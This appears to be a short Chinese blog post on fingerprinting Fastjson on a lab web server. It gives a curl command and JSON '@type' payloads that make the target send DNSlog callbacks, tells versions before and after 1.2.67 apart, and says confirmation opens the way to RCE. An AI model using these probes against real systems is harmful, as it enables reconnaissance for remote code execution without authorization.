Fastjson漏洞的识别与DNSlog回显

Fastjson的探测方式

模拟使用fastjson的网站 http://192.168.88.111:8090/

方式一

命令行

curl http://192.168.88.111:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'

识别特征:(出现则使用了Fastjson)

"status":500, "error":"Internal Server Error"

在这里插入图片描述

Bp
识别特征:(出现则使用了Fastjson)
type=Internal Server Error, status=500

在这里插入图片描述

方式二

通过DNSlog回显
在这里插入图片描述Bp

payload:识别1.2.67之前版本

{"tpa":{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}}

在这里插入图片描述
DNSLog成功回显

在这里插入图片描述payload:识别1.2.67之后版本

{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}

其他同理,若不在版本范围会出现特征type=Internal Server Error, status=500,说明该页面使用了Fastjson但版本不符没有识别到。

总结

payload有很多种,测试使用DNSlog回显的方式就可以,能识别出Fastjson版本,若在版本范围内就可以继续进行RCE攻击。

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值